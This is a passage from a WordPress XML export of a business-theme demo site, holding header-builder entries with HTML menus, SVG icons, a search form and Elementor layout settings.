bscribe to our newsletter. Be always in trend!<\/p>","text_color":"#C0C1C2"},"elements":[],"widgetType":"text-editor"}],"isInner":false}],"isInner":false},{"id":"9c9d5ea","elType":"section","settings":{"background_background":"classic","background_color":"#16171E"},"elements":[{"id":"cf538e4","elType":"column","settings":{"_column_size":100,"_inline_size":null,"border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"66c3666","elType":"section","settings":{"layout":"full_width","border_border":"solid","border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false},"border_color":"rgba(255, 255, 255, 0.1)","padding":{"unit":"px","top":"25","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[{"id":"330ee73","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"11d95e8","elType":"widget","settings":{"editor":"<p>Copyright \u00a9 2020 Maxbizz by OceanThemes. All Rights Reserved.<\/p>","align":"center","text_color":"#929399","typography_typography":"custom","typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:3;s:21:"typography_typography";i:2;s:22:"typography_line_height";i:1;s:5:"align";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:18:"icon_primary_color";i:1;}s:20:"section_social_hover";a:1:{s:19:"hover_primary_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:8;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:1:{s:12:"border_width";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:20:"typography_font_size";i:3;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:3;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:2:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_text_style";a:5:{s:10:"text_color";i:2;s:16:"text_color_hover";i:2;s:11:"text_indent";i:2;s:26:"icon_typography_typography";i:2;s:25:"icon_typography_font_size";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:3:"gap";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:27:"wp-widget-mc4wp_form_widget";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-1/</link>
		<pubDate>Fri, 17 Jul 2020 08:34:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=7</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/01_Black.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
			<a href="http://wpdemo.archiwp.com/maxbizz/contacts/" role="button">
						FREE QUOTE
					</a>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-759"><a href="http://wpdemo.archiwp.com/maxbizz/about-us/">About Us</a></li>
	<li id="menu-item-1043"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Our Services 1</a></li>
	<li id="menu-item-1021"><a href="http://wpdemo.archiwp.com/maxbizz/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-764"><a href="http://wpdemo.archiwp.com/maxbizz/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-765"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/">Our Team</a></li>
	<li id="menu-item-766"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-762"><a href="http://wpdemo.archiwp.com/maxbizz/elements/">Elements</a></li>
	<li id="menu-item-767"><a href="http://wpdemo.archiwp.com/maxbizz/typography/">Typography</a></li>
	<li id="menu-item-763"><a href="http://wpdemo.archiwp.com/maxbizz/faqs/">FAQs</a></li>
	<li id="menu-item-758"><a href="http://wpdemo.archiwp.com/maxbizz/404-2/">404</a></li>
	<li id="menu-item-760"><a href="http://wpdemo.archiwp.com/maxbizz/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1041"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1044"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1042"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1040"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1149"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1022"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Services</a>
<ul>
	<li id="menu-item-1020"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1019"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1018"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1017"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1016"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1015"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-771"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog</a>
<ul>
	<li id="menu-item-1045"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog List</a></li>
	<li id="menu-item-1068"><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-761"><a href="http://wpdemo.archiwp.com/maxbizz/contacts/">Contacts</a></li>
</ul>			</nav>
				<a href="http://wpdemo.archiwp.com/maxbizz/cart/" title="View your shopping cart"> 0
				</a>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>7</wp:post_id>
		<wp:post_date><![CDATA[2020-07-17 08:34:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-17 08:34:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8d39a3f","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"13","right":"0","bottom":"13","left":"0","isLinked":false}},"elements":[{"id":"88d13f7","elType":"column","settings":{"_column_size":50,"_inline_size":25},"elements":[{"id":"fd8c778","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_Black.svg","id":334},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"f0b1296","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"bbce169","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"title_typography_line_height":{"unit":"em","size":1.399999999999999911182158029987476766109466552734375,"sizes":[]},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"dfefc95","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false},"title_typography_line_height":{"unit":"em","size":1.399999999999999911182158029987476766109466552734375,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"481a8d7","elType":"widget","settings":{"text":"FREE QUOTE","typography_typography":"custom","typography_font_weight":"600","button_text_color":"#1B1D21","background_color":"rgba(255, 143, 62, 0.19)","hover_color":"#FFFFFF","button_background_hover_color":"#FF8F3E","border_border":"solid","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"#FF8F3E","border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"text_padding":{"unit":"px","top":"16","right":"29","bottom":"16","left":"29","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"58","isLinked":false},"typography_font_size":{"unit":"px","size":13,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contacts\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"a79077e","elType":"section","settings":{"structure":"22","background_background":"classic","background_color":"#272933","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"sticky_class":"is-fixed"},"elements":[{"id":"3c16631","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"471e1f7","elType":"widget","settings":{"nav_menu":"main-menu","text_color":"#FFFFFF","text_hover_color":"#FE8423","smenu_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":10,"spread":0,"color":""}},"elements":[],"widgetType":"imenu"}],"isInner":false},{"id":"c60b06b","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"1ca8a66","elType":"widget","settings":{"icon_color":"#FFFFFF"},"elements":[],"widgetType":"icart"},{"id":"a1e6544","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isearch"},{"id":"f2c8f30","elType":"widget","settings":{"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"icon_color":"#FFFFFF"},"elements":[],"widgetType":"isidepanel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:4;s:17:"_ot_content_align";i:2;s:5:"align";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:2;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:2;s:16:"description_text";i:2;s:8:"position";i:2;s:10:"title_size";i:2;s:13:"selected_icon";i:2;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:2;s:9:"icon_size";i:2;s:6:"rotate";i:2;}s:21:"section_style_content";a:13:{s:26:"content_vertical_alignment";i:2;s:18:"title_bottom_space";i:2;s:27:"title_typography_typography";i:2;s:26:"title_typography_font_size";i:2;s:28:"title_typography_font_weight";i:2;s:33:"description_typography_typography";i:2;s:32:"description_typography_font_size";i:2;s:34:"description_typography_font_weight";i:2;s:11:"title_color";i:2;s:28:"title_typography_font_family";i:2;s:17:"description_color";i:2;s:34:"description_typography_font_family";i:2;s:28:"title_typography_line_height";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_button";a:2:{s:4:"text";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:12:{s:21:"typography_typography";i:1;s:22:"typography_font_weight";i:1;s:17:"button_text_color";i:1;s:16:"background_color";i:1;s:11:"hover_color";i:1;s:29:"button_background_hover_color";i:1;s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:1:{s:12:"sticky_class";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:2:{s:10:"text_color";i:1;s:16:"text_hover_color";i:1;}s:19:"style_smenu_section";a:1:{s:23:"smenu_shadow_box_shadow";i:1;}}}}s:5:"icart";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}s:10:"isidepanel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header Mobile - Logo Left</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-mobile/</link>
		<pubDate>Fri, 22 May 2020 10:22:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=77</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/01_Black.svg" alt="Maxbizz">
				</a>			        
				<a href="http://wpdemo.archiwp.com/maxbizz/cart/" title="View your shopping cart"> 4
				</a>
				<!-- Form Search on Header -->
						<form role="search" method="get" action="http://wpdemo.archiwp.com/maxbizz/" >
    <label>Search for:
    <input type="search" placeholder="Search&hellip;" value="" name="s" /></label>
	<button type="submit"></button>
    </form>														
					<button></button>
						<a href="#"></a>
							<ul id="menu-main-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-759"><a href="http://wpdemo.archiwp.com/maxbizz/about-us/">About Us</a></li>
	<li id="menu-item-1043"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Our Services 1</a></li>
	<li id="menu-item-1021"><a href="http://wpdemo.archiwp.com/maxbizz/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-764"><a href="http://wpdemo.archiwp.com/maxbizz/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-765"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/">Our Team</a></li>
	<li id="menu-item-766"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-762"><a href="http://wpdemo.archiwp.com/maxbizz/elements/">Elements</a></li>
	<li id="menu-item-767"><a href="http://wpdemo.archiwp.com/maxbizz/typography/">Typography</a></li>
	<li id="menu-item-763"><a href="http://wpdemo.archiwp.com/maxbizz/faqs/">FAQs</a></li>
	<li id="menu-item-758"><a href="http://wpdemo.archiwp.com/maxbizz/404-2/">404</a></li>
	<li id="menu-item-760"><a href="http://wpdemo.archiwp.com/maxbizz/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1041"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1044"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1042"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1040"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1149"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1022"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Services</a>
<ul>
	<li id="menu-item-1020"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1019"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1018"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1017"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1016"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1015"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-771"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog</a>
<ul>
	<li id="menu-item-1045"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog List</a></li>
	<li id="menu-item-1068"><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-761"><a href="http://wpdemo.archiwp.com/maxbizz/contacts/">Contacts</a></li>
</ul>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>77</wp:post_id>
		<wp:post_date><![CDATA[2020-05-22 10:22:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-05-22 10:22:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-mobile]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"e7c1045","elType":"section","settings":{"structure":"20","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 